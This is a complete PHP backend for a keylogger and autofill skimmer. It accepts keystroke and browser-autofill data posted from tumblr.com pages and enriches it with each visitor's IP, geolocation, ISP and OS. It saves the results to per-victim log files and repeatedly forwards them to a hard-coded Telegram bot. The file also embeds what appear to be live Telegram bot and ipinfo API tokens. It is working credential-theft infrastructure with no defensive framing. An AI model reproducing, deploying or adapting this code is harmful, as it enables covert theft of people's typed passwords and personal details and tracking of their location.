<?php
session_start();

// Adjust this path to your server's local path where PHP files are located
$tempDir = 'temp/';

// Ensure temp directory exists
if (!is_dir($tempDir)) {
    mkdir($tempDir, 0755, true);
}


// CORS headers
$request_origin = isset($_SERVER['HTTP_ORIGIN']) ? $_SERVER['HTTP_ORIGIN'] : '';

// Check if the origin matches the .tumblr.com pattern
if (preg_match('/^https:\/\/([a-zA-Z0-9\-]+)\.tumblr\.com$/', $request_origin)) {
    header("Access-Control-Allow-Origin: $request_origin");
} else {
    header("Access-Control-Allow-Origin: https://newsbeat.tumblr.com"); // Fallback or default origin
}

header("Access-Control-Allow-Methods: POST");
header("Access-Control-Allow-Headers: Content-Type");


$telegramBotToken = '7149033686:AAGpYZzx_gevxWmEXHwl08PMZWo0qdP-XcQ';
$telegramChatID = '6231354707';
$ipInfoToken = 'b65155a46991f5';

// Debug logging function
function debugLog($message) {
    global $tempDir;
    $timestamp = date('Y-m-d H:i:s');
    file_put_contents($tempDir . 'debug.txt', "[$timestamp] $message\n", FILE_APPEND);
}

// Get the visitor's IP address
function getVisitorIP() {
    if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
        return $_SERVER['HTTP_CLIENT_IP'];
    } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        $ip = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR'])[0];
        return trim($ip);
    } elseif (!empty($_SERVER['REMOTE_ADDR'])) {
        return $_SERVER['REMOTE_ADDR'];
    }
    return 'UNKNOWN';
}

// Get visitor information using IPInfo API
function getIPInfo($ip) {
    global $ipInfoToken;
    $url = "https://ipinfo.io/{$ip}?token={$ipInfoToken}";
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 5);
    $response = curl_exec($ch);
    curl_close($ch);
    return json_decode($response, true);
}

// Convert the country code to an emoji flag
function getFlagEmoji($countryCode) {
    return mb_convert_encoding('&#' . (127397 + ord($countryCode[0])) . ';' . '&#' . (127397 + ord($countryCode[1])) . ';', 'UTF-8', 'HTML-ENTITIES');
}

// Detect OS from user agent
function detectOS($userAgent) {
    $osArray = [
        'Windows' => 'Windows',
        'Macintosh' => 'Mac',
        'Linux' => 'Linux',
        'Android' => 'Android',
        'iPhone' => 'iOS',
        'iPad' => 'iOS',
        'X11' => 'Unix'
    ];

    foreach ($osArray as $os => $pattern) {
        if (stripos($userAgent, $pattern) !== false) {
            return $os;
        }
    }
    return 'Unknown OS';
}

// Send data to Telegram
function sendToTelegram($message) {
    global $telegramBotToken, $telegramChatID;
    $telegramAPI = "https://api.telegram.org/bot$telegramBotToken/sendMessage";
    $data = array(
        'chat_id' => $telegramChatID,
        'text' => $message,
        'parse_mode' => 'HTML'
    );

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $telegramAPI);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/json'));

    $result = curl_exec($ch);
    curl_close($ch);

    return $result;
}

// Format the message to be sent
function formatMessage($visitorInfo, $keystrokes, $autofill) {
    $ipInfo = getIPInfo($visitorInfo['ip']);
    $flagEmoji = isset($ipInfo['country']) ? getFlagEmoji($ipInfo['country']) : '';
    
    $message = "Visit start date: " . $visitorInfo['visit_start'] . "\n";
    $message .= "Visit end: " . date('Y-m-d H:i:s') . "\n";
    $message .= "URL: " . $visitorInfo['full_url'] . "\n";
    $message .= "Referrer: " . $visitorInfo['referrer'] . "\n";
    $message .= "IP: " . $visitorInfo['ip'] . "\n";
    $message .= "Location: " . ($ipInfo['city'] ?? 'Unknown') . ", " . ($ipInfo['region'] ?? 'Unknown') . " " . ($ipInfo['country'] ?? 'Unknown') . " $flagEmoji\n";
    $message .= "ISP: " . ($ipInfo['org'] ?? 'Unknown') . "\n";
    $message .= "OS: " . detectOS($visitorInfo['user_agent']) . "\n";
    $message .= "Browser: " . $visitorInfo['browser'] . "\n";
    $message .= "---- Data ----\n";

    $message .= "Keyboard Input:\n";
    foreach ($keystrokes as $field => $values) {
        if (!is_array($values)) {
            $values = [$values]; // Convert string to array
        }
        if (!empty($values)) {
            $message .= ucfirst(str_replace('-', ' ', $field)) . ": " . implode(', ', $values) . "\n";
        }
    }

    $message .= "\nAutofill Data:\n";
    foreach ($autofill as $field => $value) {
        if (!empty($value)) {
            $message .= ucfirst(str_replace('-', ' ', $field)) . ": $value\n";
        }
    }

    return $message;
}

// Save the autofill and keystrokes to a file and send the data to Telegram
function saveAndSendAutofill($keystrokes, $autofill) {
    global $tempDir;

    if (!isset($_SESSION['visit_start'])) {
        $_SESSION['visit_start'] = date('Y-m-d H:i:s');
        $_SESSION['full_url'] = (isset($_SERVER['HTTPS']) ? "https" : "http") . "://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]";
        $_SESSION['referrer'] = $_SERVER['HTTP_REFERER'] ?? 'No Referrer';
        $_SESSION['user_agent'] = $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown';
        $_SESSION['ip'] = getVisitorIP();
    }

    $visitorInfo = [
        'visit_start' => $_SESSION['visit_start'],
        'ip' => $_SESSION['ip'],
        'full_url' => $_SESSION['full_url'],
        'referrer' => $_SESSION['referrer'],
        'user_agent' => $_SESSION['user_agent'],
        'browser' => $_SESSION['user_agent']
    ];

    // Check if more than one field is filled
    $filledFields = count(array_filter($keystrokes, function($value) { return !empty($value); })) + 
                    count(array_filter($autofill, function($value) { return !empty($value); }));
    if ($filledFields <= 1) {
        debugLog("Only one field filled, skipping Telegram message.");
        return;
    }

    // Generate file name as *Country* *IP* *Date and Time*.txt
    $ipInfo = getIPInfo($visitorInfo['ip']);
    $country = isset($ipInfo['country']) ? $ipInfo['country'] : 'Unknown';
    $logFile = $tempDir . "{$country}_{$visitorInfo['ip']}_" . date('Y-m-d_H-i-s') . ".txt";
    
    // Log the message to the file
    $message = formatMessage($visitorInfo, $keystrokes, $autofill);
    file_put_contents($logFile, $message, FILE_APPEND);

    // Wait for 30 seconds before sending the log to Telegram
    sleep(30);

    // Check for updates in the log file
    $updatedMessage = file_get_contents($logFile);
    sendToTelegram($updatedMessage);

    // Set a flag to indicate that the message has been sent
    $_SESSION['message_sent'] = true;

    // Monitor for changes in the log file
    $startTime = time();
    while (time() - $startTime < 30) {
        clearstatcache(); // Clear file status cache
        $newMessage = file_get_contents($logFile);
        if ($newMessage !== $updatedMessage) {
            sendToTelegram($newMessage); // Send updated log
            $updatedMessage = $newMessage; // Update the last sent message
        }
        sleep(1); // Check every second
    }
}

// Process incoming POST data
$input = file_get_contents('php://input');
$data = json_decode($input, true);

if (
    (isset($data['keystrokes']) && !empty($data['keystrokes'])) ||
    (isset($data['autofill']) && !empty($data['autofill']))
) {
    $keystrokes = $data['keystrokes'] ?? [];
    $autofill = $data['autofill'] ?? [];
    saveAndSendAutofill($keystrokes, $autofill);
    echo json_encode(['status' => 'success', 'message' => 'Data received and processed.']);
} else {
    echo json_encode(['status' => 'error', 'message' => 'No data received.']);
}
?>